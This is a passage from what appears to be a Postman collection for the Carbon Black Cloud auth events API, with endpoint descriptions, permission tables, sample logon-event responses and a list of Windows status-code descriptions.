Body</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"alert_id\": \"string\",\n  \"event_ids\": [ \"string\" ]\n}\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#start-auth-events-detail-job\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","detail_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"1d32e884-5d2b-41da-a126-3450a005b95d","name":"Start Auth Events Detail Job","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"event_ids\": [ \"DA9E269E-421D-469D-A212-9062888A02F4\" ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/detail_jobs"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"fdedf326-c79e-4be6-98be-d9d1aab1c816-sqs\"\n}"}],"_postman_id":"5bbcb954-46f0-4240-8747-cdcd9b92a549"},{"name":"Get Auth Events Detail Job Results","id":"f472f26f-40ed-4d99-a338-0d330bae13d5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/detail_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the Auth Events Detail Job results for a given job ID.</p>\n<p>Results may be available immediately but will be complete once the job finishes, as this call is asynchronous. The job will be complete when contacted == completed in the response.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#get-auth-events-detail-job-results\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","detail_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"78e88f0e-4fc2-4cb5-af62-b25bf53393c0","name":"Get Auth Events Detail Job Results","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/detail_jobs/{{cb_job_id}}/results"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n  \"results\": [\n    {\n      \"auth_cleartext_credentials_logon\": false,\n      \"auth_daemon_logon\": true,\n      \"auth_domain_name\": \"NT AUTHORITY\",\n      \"auth_elevated_token_logon\": true,\n      \"auth_event_action\": \"LOGON_SUCCESS\",\n      \"auth_failed_logon_count\": 0,\n      \"auth_impersonation_level\": \"IMPERSONATION_LOCAL_ONLY\",\n      \"auth_interactive_logon\": false,\n      \"auth_key_length\": 0,\n      \"auth_logon_id\": \"00000000-000003E7\",\n      \"auth_logon_type\": 5,\n      \"auth_package\": \"Negotiate\",\n      \"auth_remote_device\": \"-\",\n      \"auth_remote_logon\": false,\n      \"auth_remote_port\": 0,\n      \"auth_restricted_admin_logon\": false,\n      \"auth_user_id\": \"S-1-5-18\",\n      \"auth_username\": \"SYSTEM\",\n      \"auth_virtual_account_logon\": false,\n      \"backend_timestamp\": \"2023-01-13T17:18:36.195Z\",\n      \"childproc_count\": 0,\n      \"crossproc_count\": 48,\n      \"device_external_ip\": \"52.116.18.136\",\n      \"device_group_id\": 0,\n      \"device_id\": 12345678,\n      \"device_installed_by\": \"CBAWTD\\\\Administrator\",\n      \"device_internal_ip\": \"192.168.231.164\",\n      \"device_location\": \"UNKNOWN\",\n      \"device_name\": \"test_name\",\n      \"device_os\": \"WINDOWS\",\n      \"device_os_version\": \"Windows 10 x64\",\n      \"device_policy\": \"test-monitor\",\n      \"device_policy_id\": 20622246,\n      \"device_sensor_version\": \"3.9.0.2352\",\n      \"device_target_priority\": \"MEDIUM\",\n      \"device_timestamp\": \"2023-01-13T17:17:45.322Z\",\n      \"document_guid\": \"e0Huct8dQRyYfOEHImpfkA\",\n      \"event_id\": \"DA9E269E-421D-469D-A212-9062888A02F4\",\n      \"event_report_code\": \"SUB_RPT_NONE\",\n      \"filemod_count\": 3,\n      \"ingress_time\": 1673630293265,\n      \"modload_count\": 1,\n      \"netconn_count\": 35,\n      \"org_id\": \"ABCD1234\",\n      \"parent_cmdline\": \"wininit.exe\",\n      \"parent_cmdline_length\": 11,\n      \"parent_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n      \"parent_effective_reputation_source\": \"IGNORE\",\n      \"parent_guid\": \"ABCD1234-010dde78-00000260-00000000-1d9275de5e5b262\",\n      \"parent_hash\": [\n        \"9ef51c8ad595c5e2a123c06ad39fccd7\",\n        \"268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86\"\n      ],\n      \"parent_name\": \"c:\\\\windows\\\\system32\\\\wininit.exe\",\n      \"parent_pid\": 608,\n      \"parent_publisher\": [\n        \"Microsoft Windows Publisher\"\n      ],\n      \"parent_publisher_state\": [\n        \"FILE_SIGNATURE_STATE_VERIFIED\",\n        \"FILE_SIGNATURE_STATE_OS\",\n        \"FILE_SIGNATURE_STATE_TRUSTED\",\n        \"FILE_SIGNATURE_STATE_SIGNED\"\n      ],\n      \"parent_reputation\": \"TRUSTED_WHITE_LIST\",\n      \"process_cmdline\": [\n        \"C:\\\\Windows\\\\system32\\\\lsass.exe\"\n      ],\n      \"process_cmdline_length\": [\n        29\n      ],\n      \"process_company_name\": \"Microsoft Corporation\",\n      \"process_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n      \"process_effective_reputation_source\": \"IGNORE\",\n      \"process_elevated\": true,\n      \"process_file_description\": \"Local Security Authority Process\",\n      \"process_guid\": \"ABCD1234-010dde78-00000308-00000000-1d9275de6169dd7\",\n      \"process_hash\": [\n        \"15a556def233f112d127025ab51ac2d3\",\n        \"362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427\"\n      ],\n      \"process_integrity_level\": \"SYSTEM\",\n      \"process_internal_name\": \"lsass.exe\",\n      \"process_name\": \"c:\\\\windows\\\\system32\\\\lsass.exe\",\n      \"process_original_filename\": \"lsass.exe\",\n      \"process_pid\": [\n        776\n      ],\n      \"process_privileges\": [\n        \"SeIncreaseBasePriorityPrivilege\",\n        \"SeCreateGlobalPrivilege\",\n        \"SeChangeNotifyPrivilege\",\n        \"SeCreateSymbolicLinkPrivilege\",\n        \"SeDelegateSessionUserImpersonatePrivilege\",\n        \"SeSystemProfilePrivilege\",\n        \"SeDebugPrivilege\",\n        \"SeProfileSingleProcessPrivilege\",\n        \"SeLockMemoryPrivilege\",\n        \"SeCreatePagefilePrivilege\",\n        \"SeTimeZonePrivilege\",\n        \"SeTcbPrivilege\",\n        \"SeIncreaseWorkingSetPrivilege\",\n        \"SeImpersonatePrivilege\",\n        \"SeCreatePermanentPrivilege\",\n        \"SeAuditPrivilege\"\n      ],\n      \"process_product_name\": \"Microsoft® Windows® Operating System\",\n      \"process_product_version\": \"10.0.19041.906\",\n      \"process_publisher\": [\n        \"Microsoft Windows Publisher\"\n      ],\n      \"process_publisher_state\": [\n        \"FILE_SIGNATURE_STATE_VERIFIED\",\n        \"FILE_SIGNATURE_STATE_OS\",\n        \"FILE_SIGNATURE_STATE_TRUSTED\",\n        \"FILE_SIGNATURE_STATE_SIGNED\"\n      ],\n      \"process_reputation\": \"TRUSTED_WHITE_LIST\",\n      \"process_sha256\": \"362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427\",\n      \"process_start_time\": \"2023-01-13T14:47:02.982Z\",\n      \"process_username\": [\n        \"NT AUTHORITY\\\\SYSTEM\"\n      ],\n      \"regmod_count\": 11,\n      \"scriptload_count\": 0,\n      \"windows_event_id\": 4624\n    }\n  ],\n  \"num_found\": 1,\n  \"num_available\": 1,\n  \"approximate_unaggregated\": 1,\n  \"num_aggregated\": 1,\n  \"contacted\": 11,\n  \"completed\": 11\n}"}],"_postman_id":"f472f26f-40ed-4d99-a338-0d330bae13d5"}],"id":"65e51e0e-a701-4f46-bde6-d80305261484","_postman_id":"65e51e0e-a701-4f46-bde6-d80305261484","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Events Facet","item":[{"name":"Start Auth Events Facet Job","id":"1676e823-5fa4-4229-926b-e2f2d29ce153","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {},\n  \"exclusions\": {},\n  \"query\": \"(auth_username:Administrator) AND (device_name:test_name)\",\n  \"terms\": {\n    \"fields\": [\n      \"windows_event_id\",\n      \"auth_username\",\n      \"auth_user_id\",\n      \"auth_logon_type\",\n      \"auth_logon_id\",\n      \"auth_domain_name\",\n      \"auth_remote_device\",\n      \"auth_remote_ipv4\",\n      \"auth_remote_port\",\n      \"auth_privileges\",\n      \"auth_interactive_logon\",\n      \"auth_remote_logon\",\n      \"parent_guid\",\n      \"process_name\",\n      \"device_name\"\n    ],\n    \"rows\": 1\n  },\n  \"time_range\": {\n    \"start\": \"2023-01-10T16:20:40.471Z\",\n    \"end\": \"2023-01-20T16:20:40.471Z\"\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/facet_jobs","description":"<p>Creates an Auth Events Facet job. The results for the facet job may be requested using the job_id returned. This route will not request processes.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-body-schema\">Request Body Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"criteria\": {\n    \"\": [ { \"\": \"\" } ]\n  },\n  \"exclusions\": {\n    \"\": [ { \"\": \"\" } ]\n  },\n  \"query\": \"\",\n  \"ranges\": [\n    {\n      \"bucket_size\": { \"\": \"\" },\n      \"end\": { \"\": \"\" },\n      \"field\": \"\",\n      \"start\": { \"\": \"\" }\n    }\n  ],\n  \"terms\": {\n    \"fields\": [ \"\" ],\n    \"rows\": \n  },\n  \"time_range\": {\n    \"end\": \"\",\n    \"start\": \"\",\n    \"window\": \"\"\n  }\n}\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#start-auth-events-facet-job\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","facet_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"410e9a45-18cf-4c8c-819a-10a3054b4ed3","name":"Start Auth Events Facet Job","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {},\n    \"exclusions\": {},\n    \"query\": \"(auth_username:Administrator) AND (device_name:test_name)\",\n    \"terms\": {\n        \"fields\": [\n            \"windows_event_id\",\n            \"auth_username\",\n            \"auth_user_id\",\n            \"auth_logon_type\",\n            \"auth_logon_id\",\n            \"auth_domain_name\",\n            \"auth_remote_device\",\n            \"auth_remote_ipv4\",\n            \"auth_remote_port\",\n            \"auth_privileges\",\n            \"auth_interactive_logon\",\n            \"auth_remote_logon\",\n            \"parent_guid\",\n            \"process_name\",\n            \"device_name\"\n        ],\n        \"rows\": 1\n    },\n    \"time_range\": {\n        \"start\": \"2023-01-10T16:20:40.471Z\",\n        \"end\": \"2023-01-20T16:20:40.471Z\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/facet_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"cdae1f8a-d5dc-4f2f-aec0-d924a973b026\"\n}"}],"_postman_id":"1676e823-5fa4-4229-926b-e2f2d29ce153"},{"name":"Get Auth Events Detail Job Results","id":"4ad70bc4-a618-46e2-9073-9e68d1fc6b7a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/facet_jobs/{{cb_job_id}}/results?limit=","description":"<p>Retrieves the auth event facet results for a given <code>job_id</code>.</p>\n<p>Results may be available immediately but will be complete once the job finishes, as this call is asynchronous. The job will be complete when <code>contacted == completed</code> in the response.</p>\n<p>Results may be available immediately but will be complete once the job finishes, as this call is asynchronous. The job will be complete when contacted == completed in the response.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#get-auth-events-facet-job-results\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","facet_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Maximum number of facets per category</p>\n","type":"text/plain"},"key":"limit","value":""}],"variable":[]}},"response":[{"id":"2835b754-6f4d-4469-9082-3b8576ec8b0c","name":"Get Auth Events Detail Job Results","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/facet_jobs/{{cb_job_id}}/results?limit","host":["{{cb_url}}"],"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","facet_jobs","{{cb_job_id}}","results"],"query":[{"key":"limit","value":null,"description":"Maximum number of facets per category"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"ranges\": [],\n    \"terms\": [\n        {\n            \"values\": [\n                {\n                    \"total\": 26,\n                    \"id\": \"CBAWTD\",\n                    \"name\": \"CBAWTD\"\n                }\n            ],\n            \"field\": \"auth_domain_name\"\n        },\n        {\n            \"values\": [\n                {\n                    \"total\": 21,\n                    \"id\": \"true\",\n                    \"name\": \"true\"\n                }\n            ],\n            \"field\": \"auth_interactive_logon\"\n        },\n      ... truncated ... \n    \"num_found\": 26,\n    \"contacted\": 9,\n    \"completed\": 9\n}"}],"_postman_id":"4ad70bc4-a618-46e2-9073-9e68d1fc6b7a"}],"id":"034811d4-890b-4e28-b5a6-d5f3c8d11e79","_postman_id":"034811d4-890b-4e28-b5a6-d5f3c8d11e79","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Get Auth Events Descriptions","id":"13407acb-aebd-433b-b436-d06df7d5a070","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/descriptions","description":"<p>Returns the list of auth events and status message descriptions.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#get-auth-events-descriptions\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","descriptions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"6cc6fc05-4b83-43ed-b4be-8ffdd02cd33f","name":"Get Auth Events Descriptions","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/descriptions"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"event\": {\n        \"4624\": \"An account was successfully logged on\",\n        \"4625\": \"An account failed to log on\",\n        \"4634\": \"An account was logged off\",\n        \"4647\": \"User initiated logoff\",\n        \"4648\": \"A logon was attempted using explicit credentials\",\n        \"4672\": \"Special privileges assigned to new logon\",\n        \"4740\": \"A user account was locked out\",\n        \"4776\": \"The domain controller attempted to validate the credentials for an account\",\n        \"4777\": \"The domain controller failed to validate credentials for an account\",\n        \"6272\": \"Network Policy Server granted access to a user\"\n    },\n    \"status\": {\n        \"40000000\": {\n            \"code\": \"STATUS_OBJECT_NAME_EXISTS\",\n            \"description\": \"{Object Exists} An attempt was made to create an object but the object name already exists.\"\n        },\n        \"40000001\": {\n            \"code\": \"STATUS_THREAD_WAS_SUSPENDED\",\n            \"description\": \"{Thread Suspended} A thread termination occurred while the thread was suspended. The thread resumed, and termination proceeded.\"\n        },\n        \"40000002\": {\n            \"code\": \"STATUS_WORKING_SET_LIMIT_RANGE\",\n            \"description\": \"{Working Set Range Error} An attempt was made to set the working set minimum or maximum to values that are outside the allowable range.\"\n        },\n        \"40000003\": {\n            \"code\": \"STATUS_IMAGE_NOT_AT_BASE\",\n            \"description\": \"{Image Relocated} An image file could not be mapped at the address that is specified in the image file. Local fixes must be performed on this image.\"\n        },\n        \"40000004\": {\n            \"code\": \"STATUS_RXACT_STATE_CREATED\",\n            \"description\": \"This informational level status indicates that a specified registry subtree transaction state did not yet exist and had to be created.\"\n        },\n        \"40000005\": {\n            \"code\": \"STATUS_SEGMENT_NOTIFICATION\",\n            \"description\": \"{Segment Load} A virtual DOS machine (VDM) is loading, unloading, or moving an MS-DOS or Win16 program segment image. An exception is raised so that a debugger can load, unload, or track symbols and breakpoints within these 16-bit segments.\"\n        },\n        \"40000006\": {\n            \"code\": \"STATUS_LOCAL_USER_SESSION_KEY\",\n            \"description\": \"{Local Session Key} A user session key was requested for a local remote procedure call (RPC) connection. The session key that is returned is a constant value and not unique to this connection.\"\n        },\n        \"40000007\": {\n            \"code\": \"STATUS_BAD_CURRENT_DIRECTORY\",\n            \"description\": \"{Invalid Current Directory} The process cannot switch to the startup current directory %hs. Select OK to set the current directory to %hs, or select CANCEL to exit.\"\n        },\n        \"40000008\": {\n            \"code\": \"STATUS_SERIAL_MORE_WRITES\",\n            \"description\": \"{Serial IOCTL Complete} A serial I/O operation was completed by another write to a serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)\"\n        },\n        \"40000009\": {\n            \"code\": \"STATUS_REGISTRY_RECOVERED\",\n            \"description\": \"{Registry Recovery} One of the files that contains the system registry data had to be recovered by using a log or alternate copy. The recovery was successful.\"\n        },\n        \"40000010\": {\n            \"code\": \"STATUS_RECEIVE_EXPEDITED\",\n            \"description\": \"{Expedited Data Received} The network transport returned data to its client that was marked as expedited by the remote system.\"\n        },\n        \"40000011\": {\n            \"code\": \"STATUS_RECEIVE_PARTIAL_EXPEDITED\",\n            \"description\": \"{Partial Expedited Data Received} The network transport returned partial data to its client and this data was marked as expedited by the remote system. The remaining data will be sent later.\"\n        },\n        \"40000012\": {\n            \"code\": \"STATUS_EVENT_DONE\",\n            \"description\": \"{TDI Event Done} The TDI indication has completed successfully.\"\n        },\n        \"40000013\": {\n            \"code\": \"STATUS_EVENT_PENDING\",\n            \"description\": \"{TDI Event Pending} The TDI indication has entered the pending state.\"\n        },\n        \"40000014\": {\n            \"code\": \"STATUS_CHECKING_FILE_SYSTEM\",\n            \"description\": \"Checking file system on %wZ.\"\n        },\n        \"40000015\": {\n            \"code\": \"STATUS_FATAL_APP_EXIT\",\n            \"description\": \"{Fatal Application Exit} %hs\"\n        },\n        \"40000016\": {\n            \"code\": \"STATUS_PREDEFINED_HANDLE\",\n            \"description\": \"The specified registry key is referenced by a predefined handle.\"\n        },\n        \"40000017\": {\n            \"code\": \"STATUS_WAS_UNLOCKED\",\n            \"description\": \"{Page Unlocked} The page protection of a locked page was changed to 'No Access' and the page was unlocked from memory and from the process.\"\n        },\n        \"40000018\": {\n            \"code\": \"STATUS_SERVICE_NOTIFICATION\",\n            \"description\": \"%hs\"\n        },\n        \"40000019\": {\n            \"code\": \"STATUS_WAS_LOCKED\",\n            \"description\": \"{Page Locked} One of the pages to lock was already locked.\"\n        },\n        \"40000020\": {\n            \"code\": \"STATUS_WX86_EXCEPTION_CONTINUE\",\n            \"description\": \"An exception status code that is used by the Win32 x86 emulation subsystem.\"\n        },\n        \"40000021\": {\n            \"code\": \"STATUS_WX86_EXCEPTION_LASTCHANCE\",\n            \"description\": \"An exception status code that is used by the Win32 x86 emulation subsystem.\"\n        },\n        \"40000022\": {\n            \"code\": \"STATUS_WX86_EXCEPTION_CHAIN\",\n            \"description\": \"An exception status code that is used by the Win32 x86 emulation subsystem.\"\n        },\n        \"40000023\": {\n            \"code\": \"STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE\",\n            \"description\": \"{Machine Type Mismatch} The image file %hs is valid but is for a machine type other than the current machine.\"\n        },\n        \"40000024\": {\n            \"code\": \"STATUS_NO_YIELD_PERFORMED\",\n            \"description\": \"A yield execution was performed and no thread was available to run.\"\n        },\n        \"40000025\": {\n            \"code\": \"STATUS_TIMER_RESUME_IGNORED\",\n            \"description\": \"The resume flag to a timer API was ignored.\"\n        },\n        \"40000026\": {\n            \"code\": \"STATUS_ARBITRATION_UNHANDLED\",\n            \"description\": \"The arbiter has deferred arbitration of these resources to its parent.\"\n        },\n        \"40000027\": {\n            \"code\": \"STATUS_CARDBUS_NOT_SUPPORTED\",\n            \"description\": \"The device has detected a CardBus card in its slot.\"\n        },\n        \"40000028\": {\n            \"code\": \"STATUS_WX86_CREATEWX86TIB\",\n            \"description\": \"An exception status code that is used by the Win32 x86 emulation subsystem.\"\n        },\n        \"40000029\": {\n            \"code\": \"STATUS_MP_PROCESSOR_MISMATCH\",\n            \"description\": \"The CPUs in this multiprocessor system are not all the same revision level. To use all processors, the operating system restricts itself to the features of the least capable processor in the system. If problems occur with this system, contact the CPU manufacturer to see if this mix of processors is supported.\"\n        },\n        \"40000030\": {\n            \"code\": \"STATUS_ALPC_CHECK_COMPLETION_LIST\",\n            \"description\": \"The receive operation was successful. Check the ALPC completion list for the received message.\"\n        },\n        \"40000031\": {\n            \"code\": \"STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION\",\n            \"description\": \"The system power state is transitioning from %2 to %3 but could enter %4.\"\n        },\n        \"40000032\": {\n            \"code\": \"STATUS_ACCESS_AUDIT_BY_POLICY\",\n            \"description\": \"Access to %1 is monitored by policy rule %2.\"\n        },\n        \"40000033\": {\n            \"code\": \"STATUS_ABANDON_HIBERFILE\",\n            \"description\": \"A valid hibernation file has been invalidated and should be abandoned.\"\n        },\n        \"40000034\": {\n            \"code\": \"STATUS_BIZRULES_NOT_ENABLED\",\n            \"description\": \"Business rule scripts are disabled for the calling application.\"\n        },\n        \"40000294\": {\n            \"code\": \"STATUS_WAKE_SYSTEM\",\n            \"description\": \"The system has awoken.\"\n        },\n        \"40000370\": {\n            \"code\": \"STATUS_DS_SHUTTING_DOWN\",\n            \"description\": \"The directory service is shutting down.\"\n        },\n        \"40010001\": {\n            \"code\": \"DBG_REPLY_LATER\",\n            \"description\": \"Debugger will reply later.\"\n        },\n        \"40010002\": {\n            \"code\": \"DBG_UNABLE_TO_PROVIDE_HANDLE\",\n            \"description\": \"Debugger cannot provide a handle.\"\n        },\n        \"40010003\": {\n            \"code\": \"DBG_TERMINATE_THREAD\",\n            \"description\": \"Debugger terminated the thread.\"\n        },\n        \"40010004\": {\n            \"code\": \"DBG_TERMINATE_PROCESS\",\n            \"description\": \"Debugger terminated the process.\"\n        },\n        \"40010005\": {\n            \"code\": \"DBG_CONTROL_C\",\n            \"description\": \"Debugger obtained control of C.\"\n        },\n        \"40010006\": {\n            \"code\": \"DBG_PRINTEXCEPTION_C\",\n            \"description\": \"Debugger printed an exception on control C.\"\n        },\n        \"40010007\": {\n            \"code\": \"DBG_RIPEXCEPTION\",\n            \"description\": \"Debugger received a RIP exception.\"\n        },\n        \"40010008\": {\n            \"code\": \"DBG_CONTROL_BREAK\",\n            \"description\": \"Debugger received a control break.\"\n        },\n        \"40010009\": {\n            \"code\": \"DBG_COMMAND_EXCEPTION\",\n            \"description\": \"Debugger command communication exception.\"\n        },\n        \"40020056\": {\n            \"code\": \"RPC_NT_UUID_LOCAL_ONLY\",\n            \"description\": \"A UUID that is valid only on this computer has been allocated.\"\n        },\n        \"40190034\": {\n            \"code\": \"STATUS_RECOVERY_NOT_NEEDED\",\n            \"description\": \"The transactional resource manager is already consistent. Recovery is not needed.\"\n        },\n        \"40190035\": {\n            \"code\": \"STATUS_RM_ALREADY_STARTED\",\n            \"description\": \"The transactional resource manager has already been started.\"\n        },\n        \"40230001\": {\n            \"code\": \"STATUS_NDIS_INDICATION_REQUIRED\",\n            \"description\": \"The request will be completed later by an NDIS status indication.\"\n        },\n        \"80000001\": {\n            \"code\": \"STATUS_GUARD_PAGE_VIOLATION\",\n            \"description\": \"{EXCEPTION} Guard Page Exception A page of memory that marks the end of a data structure, such as a stack or an array, has been accessed.\"\n        },\n        \"80000002\": {\n            \"code\": \"STATUS_DATATYPE_MISALIGNMENT\",\n            \"description\": \"{EXCEPTION} Alignment Fault A data type misalignment was detected in a load or store instruction.\"\n        },\n        \"80000003\": {\n            \"code\": \"STATUS_BREAKPOINT\",\n            \"description\": \"{EXCEPTION} Breakpoint A breakpoint has been reached.\"\n        },\n        \"80000004\": {\n            \"code\": \"STATUS_SINGLE_STEP\",\n            \"description\": \"{EXCEPTION} Single Step A single step or trace operation has just been completed.\"\n        },\n        \"80000005\": {\n            \"code\": \"STATUS_BUFFER_OVERFLOW\",\n            \"description\": \"{Buffer Overflow} The data was too large to fit into the specified buffer.\"\n        },\n        \"80000006\": {\n            \"code\": \"STATUS_NO_MORE_FILES\",\n            \"description\": \"{No More Files} No more files were found which match the file specification.\"\n        },\n        \"80000007\": {\n            \"code\": 